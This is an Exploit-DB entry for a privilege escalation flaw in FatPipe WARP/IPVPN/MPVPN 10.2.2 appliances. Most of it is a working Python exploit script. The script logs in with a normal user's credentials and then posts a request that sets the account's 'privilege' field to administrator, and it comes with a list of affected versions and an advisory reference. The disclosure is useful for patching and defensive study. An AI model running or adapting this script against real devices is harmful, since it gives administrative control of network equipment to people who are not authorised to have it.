FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation

EDB-ID:

50342

CVE:

N/A




Platform:

Hardware

Date:

2021-09-28


# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com

#!/usr/bin/env python3
#
#
# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
#
#
# Vendor: FatPipe Networks Inc.
# Product web page: https://www.fatpipeinc.com
# Affected version: WARP / IPVPN / MPVPN
#                   10.2.2r38
#                   10.2.2r25
#                   10.2.2r10
#                   10.1.2r60p82
#                   10.1.2r60p71
#                   10.1.2r60p65
#                   10.1.2r60p58s1
#                   10.1.2r60p58
#                   10.1.2r60p55
#                   10.1.2r60p45
#                   10.1.2r60p35
#                   10.1.2r60p32
#                   10.1.2r60p13
#                   10.1.2r60p10
#                   9.1.2r185
#                   9.1.2r180p2
#                   9.1.2r165
#                   9.1.2r164p5
#                   9.1.2r164p4
#                   9.1.2r164
#                   9.1.2r161p26
#                   9.1.2r161p20
#                   9.1.2r161p17
#                   9.1.2r161p16
#                   9.1.2r161p12
#                   9.1.2r161p3
#                   9.1.2r161p2
#                   9.1.2r156
#                   9.1.2r150
#                   9.1.2r144
#                   9.1.2r129
#                   7.1.2r39
#                   6.1.2r70p75-m
#                   6.1.2r70p45-m
#                   6.1.2r70p26
#                   5.2.0r34
#
# Summary: FatPipe Networks invented the concept of router-clustering,
# which provides the highest level of reliability, redundancy, and speed
# of Internet traffic for Business Continuity and communications. FatPipe
# WARP achieves fault tolerance for companies by creating an easy method
# of combining two or more Internet connections of any kind over multiple
# ISPs. FatPipe utilizes all paths when the lines are up and running,
# dynamically balancing traffic over the multiple lines, and intelligently
# failing over inbound and outbound IP traffic when ISP services and/or
# components fail.
#
# FatPipe IPVPN balances load and provides reliability among multiple
# managed and CPE based VPNs as well as dedicated private networks. FatPipe
# IPVPN can also provide you an easy low-cost migration path from private
# line, Frame or Point-to-Point networks. You can aggregate multiple private,
# MPLS and public networks without additional equipment at the provider's
# site.
#
# FatPipe MPVPN, a patented router clustering device, is an essential part
# of Disaster Recovery and Business Continuity Planning for Virtual Private
# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
# 300% times more reliable, redundant and faster. MPVPN can take WANs with
# an uptime of 99.5% or less and make them 99.999988% or higher, providing
# a virtually infallible WAN. MPVPN dynamically balances load over multiple
# lines and ISPs without the need for BGP programming. MPVPN aggregates up
# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
# you need to keep your VPN up and running despite failures of service, line,
# software, or hardware.
#
# Desc: The application suffers from a privilege escalation vulnerability.
# A normal user (group USER, 0) can elevate her privileges by sending a HTTP
# POST request and setting the JSON parameter 'privilege' to integer value
# '1' gaining administrative  rights (group ADMINISTRATOR, 1).
#
# Tested on: Apache-Coyote/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5685
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
#
#
# 30.05.2016
# 25.07.2021
#
#

import sys
import time#######
import requests################
requests.packages.urllib3.disable_warnings()

if len(sys.argv) !=2:
    print
    print("********************************************************")
    print("*                                                      *")
    print("* Privilege escalation from USER to ADMINISTRATOR role *")
    print("*                          in                          *")
    print("*           FatPipe WARP/IPVPN/MPVPN v10.2.2           *")
    print("*                                                      *")
    print("*                     ZSL-2021-5685                    *")
    print("*                                                      *")
    print("********************************************************")
    print("\n[POR] Usage: ./escalator.py [IP]")
    sys.exit()

ajpi=sys.argv[1]
print
juzer=raw_input("[UNE] Username: ")
pasvord=raw_input("[UNE] Password: ")

sesija=requests.session()
logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}

hederi={'Sec-Ch-Ua'       :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
        'Accept'          :'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With':'XMLHttpRequest',
        'Sec-Ch-Ua-Mobile':'?0',
        'User-Agent'      :'Fatnet/1.b',
        'Content-Type'    :'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin'          :'https://'+ajpi,
        'Sec-Fetch-Site'  :'same-origin',
        'Sec-Fetch-Mode'  :'cors',
        'Sec-Fetch-Dest'  :'empty',
        'Referer'         :'https://'+ajpi+'/fpui/dataCollectionServlet',
        'Accept-Encoding' :'gzip, deflate',
        'Accept-Language' :'en-US,en;q=0.9',
        'Connection'      :'close'}

juarel1='https://'+ajpi+'/fpui/loginServlet'
alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)

if not 'success' in alo.text:
    print('[GRE] Login error.')
    sys.exit()
else:
    print('[POR] Authentication successful.')

print('[POR] Climbing the ladder...')

sluba='''
||    ||       .--._
||====|| __   '---._)
||    ||"")\   Q Q )
||====|| =_/   o  /
||    || | \_.-;-'-,._
||====|| |  '  o---o   )
||    ||  \   /H __H\  /
||====||   '-' \"")\/  |
||    ||     _ |_='-)_/
||====||    /  '.    )
||    ||   /         /
||====||  |___/\|   /
||    ||   |_|  |   |
||====||  /  )  \\   \\
||    || (__/    \___\\
||====||           \_\\
||    ||           /  )
||====||          (__/
'''

for k in sluba:
    sys.stdout.write(k)
    sys.stdout.flush()
    time.sleep(0.01)

juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
posta={
'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'
}
stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)

if not 'true' in stanje.text:
    print('\n[GRE] Something\'s fishy!')
    sys.exit()
else:
    print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
    sys.exit()